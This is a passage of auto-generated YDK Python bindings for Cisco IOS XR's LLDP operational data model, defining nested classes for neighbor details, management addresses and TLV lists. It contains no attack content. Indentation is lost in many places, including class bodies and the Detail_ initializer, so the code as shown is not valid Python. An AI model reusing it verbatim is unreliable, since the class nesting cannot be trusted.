    # Single child container holding the neighbor's management addresses.
    self._child_classes = OrderedDict([("network-addresses", ("network_addresses", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('peer_mac_address', (YLeaf(YType.str, 'peer-mac-address'), ['str'])),
        ('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
        ('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
        ('system_description', (YLeaf(YType.str, 'system-description'), ['str'])),
        ('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
        ('system_capabilities', (YLeaf(YType.str, 'system-capabilities'), ['str'])),
        ('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
        ('auto_negotiation', (YLeaf(YType.str, 'auto-negotiation'), ['str'])),
        ('physical_media_capabilities', (YLeaf(YType.str, 'physical-media-capabilities'), ['str'])),
        ('media_attachment_unit_type', (YLeaf(YType.uint32, 'media-attachment-unit-type'), ['int'])),
        ('port_vlan_id', (YLeaf(YType.uint32, 'port-vlan-id'), ['int'])),
    ])
    # Leaf values start unset.
    self.peer_mac_address = None
    self.port_description = None
    self.system_name = None
    self.system_description = None
    self.time_remaining = None
    self.system_capabilities = None
    self.enabled_capabilities = None
    self.auto_negotiation = None
    self.physical_media_capabilities = None
    self.media_attachment_unit_type = None
    self.port_vlan_id = None
    # Instantiate the child container and wire up its parent link.
    self.network_addresses = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses()
    self.network_addresses.parent = self
    self._children_name_map["network_addresses"] = "network-addresses"
    self._segment_path = lambda: "detail"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this container's leaf names before applying."""
    leaf_names = ['peer_mac_address', 'port_description', 'system_name', 'system_description', 'time_remaining', 'system_capabilities', 'enabled_capabilities', 'auto_negotiation', 'physical_media_capabilities', 'media_attachment_unit_type', 'port_vlan_id']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail, leaf_names, name, value)
class NetworkAddresses(Entity):
"""
Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'network-addresses' container of management addresses."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses, self).__init__()
    self.yang_name = "network-addresses"
    self.yang_parent_name = "detail"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry))])
    self._leafs = OrderedDict()  # no leafs on this container
    # List of management-address entries.
    self.lldp_addr_entry = YList(self)
    self._segment_path = lambda: "network-addresses"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK leaf validation for this entity."""
    leaf_names = []
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses, leaf_names, name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize an 'lldp-addr-entry': subtype/ifnum leafs plus the address."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, self).__init__()
    self.yang_name = "lldp-addr-entry"
    self.yang_parent_name = "network-addresses"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
        ('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
    ])
    self.ma_subtype = None
    self.if_num = None
    # Instantiate the child container and wire up its parent link.
    self.address = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address()
    self.address.parent = self
    self._children_name_map["address"] = "address"
    self._segment_path = lambda: "lldp-addr-entry"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this entry's leaf names before applying."""
    leaf_names = ['ma_subtype', 'if_num']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, leaf_names, name, value)
class Address(Entity):
    """
    Network layer address

    .. attribute:: address_type

    	AddressType

    	**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`

    .. attribute:: ipv4_address

    	IPv4 address

    	**type**\: str

    	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

    .. attribute:: ipv6_address

    	IPv6 address

    	**type**\: str

    	**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ethernet-lldp-oper'
    _revision = '2017-11-13'

    def __init__(self):
        """Initialize the 'address' container: address type plus v4/v6 leafs."""
        super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, self).__init__()
        self.yang_name = "address"
        self.yang_parent_name = "lldp-addr-entry"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container, no children
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
            ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
            ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
        ])
        self.address_type = None
        self.ipv4_address = None
        self.ipv6_address = None
        self._segment_path = lambda: "address"
        # Freeze: all later attribute writes are routed through __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Mib(Entity):
"""
MIB neighbor info
.. attribute:: unknown_tlv_list
Unknown TLV list
**type**\: :py:class:`UnknownTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList>`
.. attribute:: org_def_tlv_list
Org Def TLV list
**type**\: :py:class:`OrgDefTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList>`
.. attribute:: rem_time_mark
TimeFilter
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_local_port_num
LldpPortNumber
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_index
lldpRemIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: chassis_id_len
Chassis ID length
**type**\: int
**range:** 0..65535
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_id_len
Port ID length
**type**\: int
**range:** 0..65535
.. attribute:: combined_capabilities
Supported and combined capabilities
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'mib' container of MIB-sourced neighbor attributes."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib, self).__init__()
    self.yang_name = "mib"
    self.yang_parent_name = "lldp-neighbor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers for the unknown and organizationally-defined TLV lists.
    self._child_classes = OrderedDict([("unknown-tlv-list", ("unknown_tlv_list", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList)), ("org-def-tlv-list", ("org_def_tlv_list", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('rem_time_mark', (YLeaf(YType.uint32, 'rem-time-mark'), ['int'])),
        ('rem_local_port_num', (YLeaf(YType.uint32, 'rem-local-port-num'), ['int'])),
        ('rem_index', (YLeaf(YType.uint32, 'rem-index'), ['int'])),
        ('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
        ('chassis_id_len', (YLeaf(YType.uint16, 'chassis-id-len'), ['int'])),
        ('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
        ('port_id_len', (YLeaf(YType.uint16, 'port-id-len'), ['int'])),
        ('combined_capabilities', (YLeaf(YType.uint32, 'combined-capabilities'), ['int'])),
    ])
    # Leaf values start unset.
    self.rem_time_mark = None
    self.rem_local_port_num = None
    self.rem_index = None
    self.chassis_id_sub_type = None
    self.chassis_id_len = None
    self.port_id_sub_type = None
    self.port_id_len = None
    self.combined_capabilities = None
    # Instantiate child containers and wire up their parent links.
    self.unknown_tlv_list = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList()
    self.unknown_tlv_list.parent = self
    self._children_name_map["unknown_tlv_list"] = "unknown-tlv-list"
    self.org_def_tlv_list = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList()
    self.org_def_tlv_list.parent = self
    self._children_name_map["org_def_tlv_list"] = "org-def-tlv-list"
    self._segment_path = lambda: "mib"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this container's leaf names before applying."""
    leaf_names = ['rem_time_mark', 'rem_local_port_num', 'rem_index', 'chassis_id_sub_type', 'chassis_id_len', 'port_id_sub_type', 'port_id_len', 'combined_capabilities']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib, leaf_names, name, value)
class UnknownTlvList(Entity):
"""
Unknown TLV list
.. attribute:: lldp_unknown_tlv_entry
lldp unknown tlv entry
**type**\: list of :py:class:`LldpUnknownTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'unknown-tlv-list' container of unrecognized TLVs."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList, self).__init__()
    self.yang_name = "unknown-tlv-list"
    self.yang_parent_name = "mib"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lldp-unknown-tlv-entry", ("lldp_unknown_tlv_entry", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry))])
    self._leafs = OrderedDict()  # no leafs on this container
    # List of unknown TLV entries.
    self.lldp_unknown_tlv_entry = YList(self)
    self._segment_path = lambda: "unknown-tlv-list"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK leaf validation for this entity."""
    leaf_names = []
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList, leaf_names, name, value)
class LldpUnknownTlvEntry(Entity):
    """
    lldp unknown tlv entry

    .. attribute:: tlv_type

    	Unknown TLV type

    	**type**\: int

    	**range:** 0..255

    .. attribute:: tlv_value

    	Unknown TLV payload

    	**type**\: str

    	**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ethernet-lldp-oper'
    _revision = '2017-11-13'

    def __init__(self):
        """Initialize an 'lldp-unknown-tlv-entry' with its type/value leafs."""
        super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, self).__init__()
        self.yang_name = "lldp-unknown-tlv-entry"
        self.yang_parent_name = "unknown-tlv-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only entry, no children
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('tlv_type', (YLeaf(YType.uint8, 'tlv-type'), ['int'])),
            ('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
        ])
        self.tlv_type = None
        self.tlv_value = None
        self._segment_path = lambda: "lldp-unknown-tlv-entry"
        # Freeze: all later attribute writes are routed through __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, ['tlv_type', 'tlv_value'], name, value)
class OrgDefTlvList(Entity):
"""
Org Def TLV list
.. attribute:: lldp_org_def_tlv_entry
lldp org def tlv entry
**type**\: list of :py:class:`LldpOrgDefTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'org-def-tlv-list' container of org-defined TLVs."""
    super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList, self).__init__()
    self.yang_name = "org-def-tlv-list"
    self.yang_parent_name = "mib"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lldp-org-def-tlv-entry", ("lldp_org_def_tlv_entry", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry))])
    self._leafs = OrderedDict()  # no leafs on this container
    # List of organizationally-defined TLV entries.
    self.lldp_org_def_tlv_entry = YList(self)
    self._segment_path = lambda: "org-def-tlv-list"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK leaf validation for this entity."""
    leaf_names = []
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList, leaf_names, name, value)
class LldpOrgDefTlvEntry(Entity):
    """
    lldp org def tlv entry

    .. attribute:: oui

    	Organizationally Unique Identifier

    	**type**\: int

    	**range:** 0..4294967295

    .. attribute:: tlv_subtype

    	Org Def TLV subtype

    	**type**\: int

    	**range:** 0..255

    .. attribute:: tlv_info_indes

    	lldpRemOrgDefInfoIndex

    	**type**\: int

    	**range:** 0..4294967295

    .. attribute:: tlv_value

    	Org Def TLV payload

    	**type**\: str

    	**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ethernet-lldp-oper'
    _revision = '2017-11-13'

    def __init__(self):
        """Initialize an 'lldp-org-def-tlv-entry' with its OUI/subtype/value leafs."""
        super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, self).__init__()
        self.yang_name = "lldp-org-def-tlv-entry"
        self.yang_parent_name = "org-def-tlv-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only entry, no children
        # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('oui', (YLeaf(YType.uint32, 'oui'), ['int'])),
            ('tlv_subtype', (YLeaf(YType.uint8, 'tlv-subtype'), ['int'])),
            ('tlv_info_indes', (YLeaf(YType.uint32, 'tlv-info-indes'), ['int'])),
            ('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
        ])
        self.oui = None
        self.tlv_subtype = None
        # NOTE(review): 'tlv_info_indes' spelling mirrors the YANG leaf
        # 'tlv-info-indes'; keep as-is to match the model.
        self.tlv_info_indes = None
        self.tlv_value = None
        self._segment_path = lambda: "lldp-org-def-tlv-entry"
        # Freeze: all later attribute writes are routed through __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, ['oui', 'tlv_subtype', 'tlv_info_indes', 'tlv_value'], name, value)
class Details(Entity):
"""
The detailed LLDP neighbor table
.. attribute:: detail
Detailed information about a LLDP neighbor entry
**type**\: list of :py:class:`Detail <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize the 'details' container holding the detailed neighbor list."""
    super(Lldp.Nodes.Node.Neighbors.Details, self).__init__()
    self.yang_name = "details"
    self.yang_parent_name = "neighbors"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Details.Detail))])
    self._leafs = OrderedDict()  # no leafs on this container
    # List of detailed neighbor entries.
    self.detail = YList(self)
    self._segment_path = lambda: "details"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through YDK leaf validation for this entity."""
    leaf_names = []
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details, leaf_names, name, value)
class Detail(Entity):
"""
Detailed information about a LLDP neighbor
entry
.. attribute:: interface_name
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
The neighboring device identifier
**type**\: str
.. attribute:: lldp_neighbor
lldp neighbor
**type**\: list of :py:class:`LldpNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize a 'detail' entry: identifier leafs plus its neighbor list."""
    super(Lldp.Nodes.Node.Neighbors.Details.Detail, self).__init__()
    self.yang_name = "detail"
    self.yang_parent_name = "details"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Keyless YANG list: entries are addressed positionally.
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("lldp-neighbor", ("lldp_neighbor", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
        ('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
    ])
    self.interface_name = None
    self.device_id = None
    # Neighbor records for this interface/device pair.
    self.lldp_neighbor = YList(self)
    self._segment_path = lambda: "detail"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this entry's leaf names before applying."""
    leaf_names = ['interface_name', 'device_id']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail, leaf_names, name, value)
class LldpNeighbor(Entity):
"""
lldp neighbor
.. attribute:: detail
Detailed neighbor info
**type**\: :py:class:`Detail_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_>`
.. attribute:: mib
MIB neighbor info
**type**\: :py:class:`Mib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib>`
.. attribute:: receiving_interface_name
Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: receiving_parent_interface_name
Parent Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
Device identifier
**type**\: str
.. attribute:: chassis_id
Chassis id
**type**\: str
.. attribute:: port_id_detail
Outgoing port identifier
**type**\: str
.. attribute:: header_version
Version number
**type**\: int
**range:** 0..255
.. attribute:: hold_time
Remaining hold time
**type**\: int
**range:** 0..65535
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: platform
Platform type
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
    """Initialize an 'lldp-neighbor' record with its leafs and child containers."""
    super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor, self).__init__()
    self.yang_name = "lldp-neighbor"
    self.yang_parent_name = "detail"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # YANG child "detail" maps to python class Detail_ (trailing underscore
    # avoids clashing with the enclosing Detail class name).
    self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_)), ("mib", ("mib", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib))])
    # Leaf map: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('receiving_interface_name', (YLeaf(YType.str, 'receiving-interface-name'), ['str'])),
        ('receiving_parent_interface_name', (YLeaf(YType.str, 'receiving-parent-interface-name'), ['str'])),
        ('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
        ('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
        ('port_id_detail', (YLeaf(YType.str, 'port-id-detail'), ['str'])),
        ('header_version', (YLeaf(YType.uint8, 'header-version'), ['int'])),
        ('hold_time', (YLeaf(YType.uint16, 'hold-time'), ['int'])),
        ('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
        ('platform', (YLeaf(YType.str, 'platform'), ['str'])),
    ])
    # Leaf values start unset.
    self.receiving_interface_name = None
    self.receiving_parent_interface_name = None
    self.device_id = None
    self.chassis_id = None
    self.port_id_detail = None
    self.header_version = None
    self.hold_time = None
    self.enabled_capabilities = None
    self.platform = None
    # Instantiate child containers and wire up their parent links.
    self.detail = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_()
    self.detail.parent = self
    self._children_name_map["detail"] = "detail"
    self.mib = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib()
    self.mib.parent = self
    self._children_name_map["mib"] = "mib"
    self._segment_path = lambda: "lldp-neighbor"
    # Freeze: all later attribute writes are routed through __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate writes against this record's leaf names before applying."""
    leaf_names = ['receiving_interface_name', 'receiving_parent_interface_name', 'device_id', 'chassis_id', 'port_id_detail', 'header_version', 'hold_time', 'enabled_capabilities', 'platform']
    self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor, leaf_names, name, value)
class Detail_(Entity):
"""
Detailed neighbor info
.. attribute:: network_addresses
Management Addresses
**type**\: :py:class:`NetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses>`
.. attribute:: peer_mac_address
Peer Mac Address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
.. attribute:: port_description
Port Description
**type**\: str
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: system_description
System Description
**type**\: str
.. attribute:: time_remaining
Time remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: system_capabilities
System Capabilities
**type**\: str
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: auto_negotiation
Auto Negotiation
**type**\: str
.. attribute:: physical_media_capabilities
Physical media capabilities
**type**\: str
.. attribute:: media_attachment_unit_type
Media Attachment Unit type
**type**\: int
**range:** 0..4294967295
.. attribute:: port_vlan_id
Vlan ID
**type**\: int
**range:** 0..4294967295
"""
# NOTE: auto-generated YDK binding class. The trailing underscore in
# "Detail_" avoids a name clash with the enclosing "Detail" class in the
# model path (Lldp.Nodes.Node.Neighbors.Details.Detail).
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
# Register the YANG metadata for this container: child-class map, leaf
# map, and default (None) leaf values. Statement order matters here
# because the overridden __setattr__ starts validating attribute writes
# as soon as _is_frozen is set at the end of this method.
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_, self).__init__()
self.yang_name = "detail"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network-addresses", ("network_addresses", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses))])
# Maps each Python attribute name to (YLeaf(yang-type, yang-leaf-name),
# [accepted python types]).
self._leafs = OrderedDict([
('peer_mac_address', (YLeaf(YType.str, 'peer-mac-address'), ['str'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
('system_description', (YLeaf(YType.str, 'system-description'), ['str'])),
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('system_capabilities', (YLeaf(YType.str, 'system-capabilities'), ['str'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('auto_negotiation', (YLeaf(YType.str, 'auto-negotiation'), ['str'])),
('physical_media_capabilities', (YLeaf(YType.str, 'physical-media-capabilities'), ['str'])),
('media_attachment_unit_type', (YLeaf(YType.uint32, 'media-attachment-unit-type'), ['int'])),
('port_vlan_id', (YLeaf(YType.uint32, 'port-vlan-id'), ['int'])),
])
self.peer_mac_address = None
self.port_description = None
self.system_name = None
self.system_description = None
self.time_remaining = None
self.system_capabilities = None
self.enabled_capabilities = None
self.auto_negotiation = None
self.physical_media_capabilities = None
self.media_attachment_unit_type = None
self.port_vlan_id = None
# Wire up the singleton child container and its YANG segment name.
self.network_addresses = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses()
self.network_addresses.parent = self
self._children_name_map["network_addresses"] = "network-addresses"
self._segment_path = lambda: "detail"
# Freeze last: from here on only declared leaf names can be assigned.
self._is_frozen = True
def __setattr__(self, name, value):
# Delegate to YDK's checked setter with the writable leaf names.
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_, ['peer_mac_address', 'port_description', 'system_name', 'system_description', 'time_remaining', 'system_capabilities', 'enabled_capabilities', 'auto_negotiation', 'physical_media_capabilities', 'media_attachment_unit_type', 'port_vlan_id'], name, value)
class NetworkAddresses(Entity):
"""
Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses, self).__init__()
self.yang_name = "network-addresses"
self.yang_parent_name = "detail"
self.is_top_level_class = False
self.has_list_ancestor = True
